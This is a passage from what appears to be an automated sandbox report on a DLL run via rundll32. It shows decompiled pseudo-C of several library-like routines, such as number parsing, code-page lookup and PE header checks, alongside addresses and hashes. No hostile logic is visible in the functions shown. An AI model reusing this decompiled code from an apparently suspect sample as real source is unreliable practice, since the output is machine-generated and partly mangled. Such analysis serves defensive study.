									_t153 =  *(_t252 - 0x44);
									goto L64;
								}
								L36:
								__eflags = _t251 - _t242;
								if(_t251 == _t242) {
									goto L38;
								}
								L37:
								 *(_t252 - 0x68) = ((0 | _t251 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
								goto L38;
							}
							if( *((intOrPtr*)(_t198 + 4)) == 0) {
								E6E20C59E(_t198);
							}
							if( *((intOrPtr*)(_t198 + 5)) !=  *((intOrPtr*)(_t252 - 0x2c))) {
								goto L35;
							} else {
								 *((char*)(_t252 - 0x5d)) = 1;
								 *((char*)(_t252 - 0x74)) = 1;
								E6E20BD8B(_t198);
								_t185 = E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
								if(1 != 0) {
									L33:
									__eflags = _t251;
									if(_t251 != 0) {
										goto L36;
									}
									_t251 = 8;
									goto L35;
								}
								if( *((intOrPtr*)(_t198 + 4)) == _t185) {
									E6E20C59E(_t198);
								}
								_t186 =  *((intOrPtr*)(_t198 + 5));
								if(_t186 ==  *((intOrPtr*)(_t252 - 0x13))) {
									L30:
									if(_t251 == 0 || _t251 == 0x10) {
										_t251 = 0x10;
										 *((char*)(_t252 - 0x5d)) = 0;
										 *((char*)(_t252 - 0x74)) = 0;
										E6E20BD8B(_t198);
										goto L37;
									} else {
										goto L33;
									}
								} else {
									if( *((char*)(_t198 + 4)) == 0) {
										E6E20C59E(_t198);
										_t186 =  *((intOrPtr*)(_t198 + 5));
									}
									if(_t186 !=  *((intOrPtr*)(_t252 - 0x14))) {
										goto L33;
									} else {
										goto L30;
									}
								}
							}
						}
						_push(0x10);
						L17:
						_pop(_t251);
						goto L19;
					}
					_push(8);
					goto L17;
				} else {
					if( *((intOrPtr*)(_t198 + 4)) == _t146) {
						E6E20C59E(_t198);
					}
					_t192 =  *((intOrPtr*)(_t198 + 5));
					if(_t192 !=  *((intOrPtr*)(_t252 - 0x15))) {
						__eflags =  *((char*)(_t198 + 4));
						if( *((char*)(_t198 + 4)) == 0) {
							E6E20C59E(_t198);
							_t192 =  *((intOrPtr*)(_t198 + 5));
						}
						__eflags = _t192 -  *((intOrPtr*)(_t252 - 0x16));
						if(_t192 !=  *((intOrPtr*)(_t252 - 0x16))) {
							goto L13;
						} else {
							 *_t247 = 0x2d;
							goto L12;
						}
					} else {
						 *_t247 = 0x2b;
						L12:
						 *((intOrPtr*)(_t252 - 0x6c)) = _t247 + 1;
						E6E20BD8B(_t198);
						goto L13;
					}
				}
			}


































                          0x6e20b968
                          0x6e20b96f
                          0x6e20b977
                          0x6e20b97a
                          0x6e20b980
                          0x6e20b983
                          0x6e20b987
                          0x6e20b98a
                          0x6e20b98f
                          0x6e20b998
                          0x6e20b99d
                          0x6e20b9a5
                          0x6e20b9a7
                          0x6e20b9ab
                          0x6e20b9af
                          0x6e20b9be
                          0x6e20b9b1
                          0x6e20b9b1
                          0x6e20b9b1
                          0x6e20b9c4
                          0x6e20b9e1
                          0x6e20b9e9
                          0x6e20b9eb
                          0x6e20b9f5
                          0x6e20b9f8
                          0x6e20b9ff
                          0x6e20ba3f
                          0x6e20ba44
                          0x6e20ba4a
                          0x6e20ba4b
                          0x6e20ba54
                          0x6e20ba5a
                          0x6e20ba60
                          0x6e20ba69
                          0x6e20ba6b
                          0x6e20ba6b
                          0x6e20ba6d
                          0x6e20ba74
                          0x6e20ba77
                          0x6e20ba7a
                          0x6e20ba7d
                          0x6e20ba84
                          0x6e20bb04
                          0x6e20bb04
                          0x6e20bb06
                          0x6e20bb1e
                          0x6e20bb21
                          0x6e20bb2a
                          0x6e20bb31
                          0x6e20bb35
                          0x6e20bb45
                          0x6e20bb49
                          0x6e20bb4b
                          0x6e20bb4e
                          0x6e20bb55
                          0x6e20bc5d
                          0x6e20bc60
                          0x6e20bc63
                          0x6e20bc63
                          0x6e20bc66
                          0x6e20bc6a
                          0x6e20bc6d
                          0x6e20bc6f
                          0x6e20bc6f
                          0x6e20bc74
                          0x6e20bcdd
                          0x6e20bcdd
                          0x00000000
                          0x6e20bc76
                          0x6e20bc76
                          0x6e20bc7a
                          0x6e20bc7f
                          0x00000000
                          0x00000000
                          0x6e20bc81
                          0x6e20bc84
                          0x6e20bca5
                          0x6e20bca7
                          0x6e20bcc2
                          0x6e20bcc2
                          0x6e20bcc8
                          0x6e20bcca
                          0x6e20bcca
                          0x00000000
                          0x6e20bcc8
                          0x6e20bcb0
                          0x6e20bcb3
                          0x6e20bcb5
                          0x6e20bcb5
                          0x6e20bcbd
                          0x6e20bcc0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e20bcc0
                          0x6e20bc89
                          0x6e20bc8c
                          0x6e20bc92
                          0x6e20bc94
                          0x6e20bc97
                          0x6e20bc97
                          0x6e20bca0
                          0x6e20bca3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e20bca3
                          0x6e20bcce
                          0x6e20bcd2
                          0x6e20bcd5
                          0x6e20bcd7
                          0x6e20bcda
                          0x6e20bcda
                          0x6e20bce0
                          0x6e20bce3
                          0x6e20bce6
                          0x6e20bcee
                          0x6e20bcfa
                          0x6e20bcfa
                          0x6e20bc74
                          0x6e20bb5b
                          0x6e20bb5e
                          0x6e20bb62
                          0x6e20bb66
                          0x6e20bb66
                          0x6e20bb6e
                          0x6e20bb71
                          0x6e20bb80
                          0x6e20bb88
                          0x6e20bb8b
                          0x6e20bb90
                          0x6e20bbdc
                          0x6e20bbdf
                          0x6e20bbe2
                          0x6e20bbe5
                          0x6e20bbe8
                          0x6e20bbea
                          0x6e20bbea
                          0x6e20bbec
                          0x6e20bbf0
                          0x6e20bc42
                          0x6e20bc44
                          0x00000000
                          0x00000000
                          0x6e20bc46
                          0x6e20bc4c
                          0x6e20bc4e
                          0x6e20bc4e
                          0x6e20bc54
                          0x6e20bc59
                          0x00000000
                          0x6e20bc56
                          0x6e20bc56
                          0x00000000
                          0x6e20bc56
                          0x6e20bbf2
                          0x6e20bbf2
                          0x6e20bbf6
                          0x00000000
                          0x00000000
                          0x6e20bbf8
                          0x6e20bbfc
                          0x6e20bc10
                          0x6e20bbfe
                          0x6e20bc00
                          0x6e20bc05
                          0x6e20bc08
                          0x6e20bc0b
                          0x6e20bc0b
                          0x6e20bc13
                          0x6e20bc16
                          0x00000000
                          0x6e20bc18
                          0x6e20bc1d
                          0x6e20bc22
                          0x6e20bc22
                          0x00000000
                          0x6e20bc22
                          0x6e20bc16
                          0x6e20bb92
                          0x6e20bb96
                          0x6e20bb9c
                          0x6e20bb9f
                          0x6e20bba1
                          0x6e20bbab
                          0x6e20bbae
                          0x6e20bbb2
                          0x6e20bbb2
                          0x6e20bbab
                          0x6e20bbb9
                          0x6e20bbbc
                          0x6e20bbc0
                          0x6e20bbc2
                          0x6e20bbc2
                          0x6e20bbc9
                          0x6e20bbcf
                          0x6e20bbd2
                          0x6e20bbd4
                          0x6e20bbd4
                          0x6e20bbd7
                          0x6e20bbd7
                          0x6e20bbc9
                          0x6e20bc23
                          0x6e20bc25
                          0x6e20bc34
                          0x6e20bc3c
                          0x6e20bc3f
                          0x00000000
                          0x6e20bc3f
                          0x6e20bb08
                          0x6e20bb08
                          0x6e20bb0a
                          0x00000000
                          0x00000000
                          0x6e20bb0c
                          0x6e20bb1b
                          0x00000000
                          0x6e20bb1b
                          0x6e20ba89
                          0x6e20ba8d
                          0x6e20ba8d
                          0x6e20ba98
                          0x00000000
                          0x6e20ba9a
                          0x6e20ba9e
                          0x6e20baa1
                          0x6e20baa4
                          0x6e20baae
                          0x6e20bab5
                          0x6e20bafd
                          0x6e20bafd
                          0x6e20baff
                          0x00000000
                          0x00000000
                          0x6e20bb03
                          0x00000000
                          0x6e20bb03
                          0x6e20baba
                          0x6e20babe
                          0x6e20babe
                          0x6e20bac3
                          0x6e20bac9
                          0x6e20bae0
                          0x6e20bae2
                          0x6e20baef
                          0x6e20baf0
                          0x6e20baf3
                          0x6e20baf6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e20bacb
                          0x6e20bacf
                          0x6e20bad3
                          0x6e20bad8
                          0x6e20bad8
                          0x6e20bade
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e20bade
                          0x6e20bac9
                          0x6e20ba98
                          0x6e20ba62
                          0x6e20ba64
                          0x6e20ba64
                          0x00000000
                          0x6e20ba64
                          0x6e20ba56
                          0x00000000
                          0x6e20ba01
                          0x6e20ba04
                          0x6e20ba08
                          0x6e20ba08
                          0x6e20ba0d
                          0x6e20ba13
                          0x6e20ba1a
                          0x6e20ba1e
                          0x6e20ba22
                          0x6e20ba27
                          0x6e20ba27
                          0x6e20ba2a
                          0x6e20ba2d
                          0x00000000
                          0x6e20ba2f
                          0x6e20ba2f
                          0x00000000
                          0x6e20ba2f
                          0x6e20ba15
                          0x6e20ba15
                          0x6e20ba32
                          0x6e20ba37
                          0x6e20ba3a
                          0x00000000
                          0x6e20ba3a
                          0x6e20ba13

                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6E20B96F
                            • Part of subcall function 6E20A2F1: __EH_prolog3.LIBCMT ref: 6E20A2F8
                            • Part of subcall function 6E20A2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6E20A302
                            • Part of subcall function 6E20A2F1: int.LIBCPMT ref: 6E20A319
                            • Part of subcall function 6E20A2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A373
                          • _Find_unchecked1.LIBCPMT ref: 6E20BB80
                          Strings
                          • 0123456789ABCDEFabcdef-+Xx, xrefs: 6E20B9D7
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
                          • String ID: 0123456789ABCDEFabcdef-+Xx
                          • API String ID: 1853221402-2799312399
                          • Opcode ID: a9fa03192273bbec4100fdc6bbc0c86037cdef9073a714188b04bbb435a9cf5b
                          • Instruction ID: 9058b79f0aed7c49f61ba439b98479c1ba6c938a87b63f456b38d7e56f044c7b
                          • Opcode Fuzzy Hash: a9fa03192273bbec4100fdc6bbc0c86037cdef9073a714188b04bbb435a9cf5b
                          • Instruction Fuzzy Hash: A6C19E34D1828E8FDF62CBE8C490BDCBBB7AF45304F1444A9D8966B2CECB649945CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2460ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 6E24617D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          • API String ID: 3213639722-2276729525
                          • Opcode ID: 9a38686656c69bb31b5986953c7049778537250d33f103edfcf7d9ba770ff6b0
                          • Instruction ID: c41f90c39b4b520227d771ef12d26310ff06030748f0458a2c9aae07ff911396
                          • Opcode Fuzzy Hash: 9a38686656c69bb31b5986953c7049778537250d33f103edfcf7d9ba770ff6b0
                          • Instruction Fuzzy Hash: DE51ACE1AB810FD7DB456BE4CB9075A3BA7EB01B02F20CD5CD095823DDEB3184A4DA52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25DBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E6E25DBAF(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t15 = E6E254323(_t23, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e272f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e272f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t49 = _t17;
								if(_t17 != 0) {
									_t16 = E6E24BF09(_t23, _t23);
									goto L25;
								}
								if(E6E254323(_t23, _t49, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

















                          0x6e25dbb4
                          0x6e25dbb5
                          0x6e25dbbc
                          0x6e25dc62
                          0x6e25dc76
                          0x6e25dc7b
                          0x6e25dc7d
                          0x6e25dc83
                          0x6e25dc86
                          0x6e25dc88
                          0x6e25dc8a
                          0x6e25dc8a
                          0x6e25dc90
                          0x6e25dc95
                          0x6e25dc95
                          0x6e25dc7f
                          0x6e25dc7f
                          0x00000000
                          0x6e25dc7f
                          0x6e25dbc2
                          0x6e25dbc7
                          0x00000000
                          0x00000000
                          0x6e25dbcd
                          0x6e25dbd2
                          0x6e25dbd4
                          0x6e25dbd4
                          0x6e25dbda
                          0x00000000
                          0x00000000
                          0x6e25dbdf
                          0x6e25dbf6
                          0x6e25dbf6
                          0x6e25dbff
                          0x6e25dc01
                          0x00000000
                          0x00000000
                          0x6e25dc03
                          0x6e25dc08
                          0x6e25dc0a
                          0x6e25dc0a
                          0x6e25dc10
                          0x00000000
                          0x00000000
                          0x6e25dc15
                          0x6e25dc33
                          0x6e25dc33
                          0x6e25dc35
                          0x6e25dc5a
                          0x00000000
                          0x6e25dc5f
                          0x6e25dc52
                          0x00000000
                          0x00000000
                          0x6e25dc54
                          0x00000000
                          0x6e25dc54
                          0x6e25dc17
                          0x6e25dc1f
                          0x00000000
                          0x00000000
                          0x6e25dc21
                          0x6e25dc24
                          0x6e25dc2a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25dc2c
                          0x6e25dc2e
                          0x6e25dc30
                          0x6e25dc30
                          0x00000000
                          0x6e25dc30
                          0x6e25dbe1
                          0x6e25dbe9
                          0x00000000
                          0x00000000
                          0x6e25dbeb
                          0x6e25dbee
                          0x6e25dbf4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25dbf4
                          0x6e25dbfa
                          0x6e25dbfc
                          0x6e25dbfc
                          0x00000000

                          APIs
                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E25DE50,?,00000050,?,?,?,?,?), ref: 6E25DC8A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ACP$OCP
                          • API String ID: 0-711371036
                          • Opcode ID: aa0bd6f1b6e2c06dc8e55211c5573579fa5ed5fb6d44092be839a23f1e0b0ad1
                          • Instruction ID: 765538ebe0c3eaa7bb62265b682247ad23f188a8fce3eedb0c41bb3cc0437e93
                          • Opcode Fuzzy Hash: aa0bd6f1b6e2c06dc8e55211c5573579fa5ed5fb6d44092be839a23f1e0b0ad1
                          • Instruction Fuzzy Hash: AE21C466A6410FA7E754CFD8CB00B8B73ABAB45B53F528424E90AD7308E772D961CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21FAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E6E21FAE9(void* __ebx, void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t49;
				signed int _t55;

				if( *0x6e2c6e51 == 0) {
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 == 0) {
						L4:
						_t19 = E6E22079B();
						__eflags = _t19;
						if(_t19 == 0) {
							L9:
							_t20 =  *0x6e2c506c; // 0x8e829fa6
							_push(_t49);
							_push(0x20);
							asm("ror eax, cl");
							_t23 = (_t20 & 0x0000001f | 0xffffffff) ^  *0x6e2c506c;
							__eflags = _t23;
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							goto L10;
						} else {
							__eflags = _t55;
							if(_t55 != 0) {
								goto L9;
							} else {
								_t25 = E6E24A8CA(_t19, 0x6e2c6e54);
								__eflags = _t25;
								if(_t25 != 0) {
									L8:
									_t24 = 0;
								} else {
									_t26 = E6E24A8CA(_t25, 0x6e2c6e60);
									__eflags = _t26;
									if(_t26 == 0) {
										L10:
										 *0x6e2c6e51 = 1;
										_t24 = 1;
									} else {
										goto L8;
									}
								}
							}
						}
						return _t24;
					} else {
						__eflags = _t55 - 1;
						if(_t55 != 1) {
							E6E2207A7(__edx, _t49, _t55, 5);
							asm("int3");
							E6E220990(__ebx, _t49, 0x6e2c2780, 8);
							_v8 = _v8 & 0x00000000;
							__eflags =  *0x6e1e0000 - 0x5a4d; // 0x5a4d
							if(__eflags != 0) {
								L19:
								_v8 = 0xfffffffe;
								_t30 = 0;
								__eflags = 0;
							} else {
								_t31 =  *0x6e1e003c; // 0x100
								__eflags =  *((intOrPtr*)(_t31 + 0x6e1e0000)) - 0x4550;
								if( *((intOrPtr*)(_t31 + 0x6e1e0000)) != 0x4550) {
									goto L19;
								} else {
									__eflags =  *((intOrPtr*)(_t31 + 0x6e1e0018)) - 0x10b;
									if( *((intOrPtr*)(_t31 + 0x6e1e0018)) != 0x10b) {
										goto L19;
									} else {
										_t34 = E6E21F931(0x6e1e0000, _a4 - 0x6e1e0000);
										__eflags = _t34;
										if(_t34 == 0) {
											goto L19;
										} else {
											__eflags =  *(_t34 + 0x24);
											if( *(_t34 + 0x24) < 0) {
												goto L19;
											} else {
												_v8 = 0xfffffffe;
												_t30 = 1;
											}
										}
									}
								}
							}
							 *[fs:0x0] = _v20;
							return _t30;
						} else {
							goto L4;
						}
					}
				} else {
					return 1;
				}
			}





















                          0x6e21faf6
                          0x6e21fafd
                          0x6e21fb00
                          0x6e21fb02
                          0x6e21fb09
                          0x6e21fb09
                          0x6e21fb0e
                          0x6e21fb10
                          0x6e21fb38
                          0x6e21fb38
                          0x6e21fb40
                          0x6e21fb49
                          0x6e21fb51
                          0x6e21fb53
                          0x6e21fb53
                          0x6e21fb59
                          0x6e21fb5c
                          0x6e21fb5f
                          0x6e21fb62
                          0x6e21fb63
                          0x6e21fb64
                          0x6e21fb6a
                          0x6e21fb6d
                          0x6e21fb73
                          0x6e21fb76
                          0x6e21fb77
                          0x6e21fb78
                          0x00000000
                          0x6e21fb12
                          0x6e21fb12
                          0x6e21fb14
                          0x00000000
                          0x6e21fb16
                          0x6e21fb1b
                          0x6e21fb21
                          0x6e21fb23
                          0x6e21fb34
                          0x6e21fb34
                          0x6e21fb25
                          0x6e21fb2a
                          0x6e21fb30
                          0x6e21fb32
                          0x6e21fb7a
                          0x6e21fb7a
                          0x6e21fb81
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e21fb32
                          0x6e21fb23
                          0x6e21fb14
                          0x6e21fb85
                          0x6e21fb04
                          0x6e21fb04
                          0x6e21fb07
                          0x6e21fb88
                          0x6e21fb8d
                          0x6e21fb95
                          0x6e21fb9a
                          0x6e21fba3
                          0x6e21fbaa
                          0x6e21fc09
                          0x6e21fc09
                          0x6e21fc10
                          0x6e21fc10
                          0x6e21fbac
                          0x6e21fbac
                          0x6e21fbb1
                          0x6e21fbbb
                          0x00000000
                          0x6e21fbbd
                          0x6e21fbc2
                          0x6e21fbc9
                          0x00000000
                          0x6e21fbcb
                          0x6e21fbd7
                          0x6e21fbde
                          0x6e21fbe0
                          0x00000000
                          0x6e21fbe2
                          0x6e21fbe2
                          0x6e21fbe6
                          0x00000000
                          0x6e21fbe8
                          0x6e21fbe8
                          0x6e21fbef
                          0x6e21fbef
                          0x6e21fbe6
                          0x6e21fbe0
                          0x6e21fbc9
                          0x6e21fbbb
                          0x6e21fc15
                          0x6e21fc21
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e21fb07
                          0x6e21faf8
                          0x6e21fafb
                          0x6e21fafb

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Tn,n$`n,n
                          • API String ID: 0-3894424707
                          • Opcode ID: e7cc0cfb5cd8ac270b2d3b25d6322bf7425c1fd35880958ac14b7fbd3a20702d
                          • Instruction ID: 0fd38b8e3836c9714727457c7d25762572ff14ae64ee4c53b92351e2029f33ae
                          • Opcode Fuzzy Hash: e7cc0cfb5cd8ac270b2d3b25d6322bf7425c1fd35880958ac14b7fbd3a20702d
                          • Instruction Fuzzy Hash: FD11B276C1461E9BEF80CEE8C454ADF77E79F0AB25F104166D921EB280D6B0C7018BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2059F2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Deallocate
                          • String ID: :B n$[json.exception.
                          • API String ID: 1075933841-3849622167
                          • Opcode ID: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
                          • Instruction ID: 218fd96fd83dae967e78c502c145d0d31e2c87026cedc3ff35e28bf0706639ee
                          • Opcode Fuzzy Hash: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
                          • Instruction Fuzzy Hash: E50108765042195F8314CF58DCC0C4BB7DEEE892147100A6DF429C7341EB31E90587A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E203751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                          Download Yara Rule
                          C-Code - Quality: 61%
                          			E6E203751(void* __ebx, signed int* __ecx, void* __edi, void* __esi) {
				signed int _t35;
				void* _t42;
				signed int _t46;
				signed char _t51;
				signed char _t53;
				signed int* _t55;
				intOrPtr* _t58;
				void* _t59;
				intOrPtr* _t60;

				E6E2200E0(0x6e268012, __ebx, __edi, __esi, 0x38);
				_t58 = __ecx;
				_t51 =  *((intOrPtr*)(_t59 + 8));
				_t35 = _t51 & 0x000000ff;
				if(_t35 > 8) {
					 *__ecx =  *__ecx & 0x00000000;
					__eflags = _t51;
					if(_t51 != 0) {
						goto L4;
					} else {
						E6E201F9A(_t59 - 0x28, "961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1");
						 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
						_t53 = _t59 - 0x44;
						E6E200C7C(__ebx, _t53, __edi, _t58, __eflags);
						 *_t60 = 0x6e2c3430;
						_t42 = E6E223D74(_t59 - 0x44, _t59 - 0x28);
						asm("scasb");
						asm("aaa");
						 *(_t58 + 0x71) =  *(_t58 + 0x71) & _t53;
						asm("aaa");
						 *(_t58 - 0x7e) =  *(_t58 - 0x7e) & _t53;
						asm("aaa");
						 *(_t58 - 0x77) =  *(_t58 - 0x77) & _t53;
						asm("aaa");
						 *(_t58 - 0x69) =  *(_t58 - 0x69) & _t53;
						asm("aaa");
						 *(_t58 - 0x64) =  *(_t58 - 0x64) & _t53;
						asm("aaa");
						 *(_t58 - 0x64) =  *(_t58 - 0x64) & _t53;
						asm("aaa");
						 *(_t58 - 0x5b) =  *(_t58 - 0x5b) & _t53;
						asm("aaa");
						 *(_t58 - 0x70) =  *(_t58 - 0x70) & _t53;
						asm("aaa");
						 *(_t58 - 0x75) =  *(_t58 - 0x75) & _t53;
						0xafabfb26();
						_t55 = _t53 + 1 + _t42 + 0xae;
						asm("clc");
						_t46 =  *_t55;
						__eflags = _t46 - _t55[1];
						_t32 = _t46 == _t55[1];
						__eflags = _t32;
						return _t46 & 0xffffff00 | _t32;
					}
				} else {
					switch( *((intOrPtr*)(_t35 * 4 +  &M6E2037E9))) {
						case 0:
							 *__esi =  *__esi & 0x00000000;
							goto L4;
						case 1:
							_t48 = E6E204B1C(__ebx, __edi, __ecx, _t61);
							goto L3;
						case 2:
							__eax = E6E204B64(__eflags);
							goto L3;
						case 3:
							__eax = E6E204B87(__ebx, __edi, __esi, __eflags);
							goto L3;
						case 4:
							 *__esi = 0;
							goto L4;
						case 5:
							 *__esi =  *__esi & 0x00000000;
							__esi[1] = __esi[1] & 0x00000000;
							goto L4;
						case 6:
							asm("xorps xmm0, xmm0");
							asm("movsd [esi], xmm0");
							goto L4;
						case 7:
							__eax = E6E204BCF(__eflags);
							L3:
							 *_t58 = _t48;
							L4:
							return E6E22008A(_t58, _t49, _t56, _t58);
							goto L14;
					}
				}
				L14:
			}












                          0x6e203758
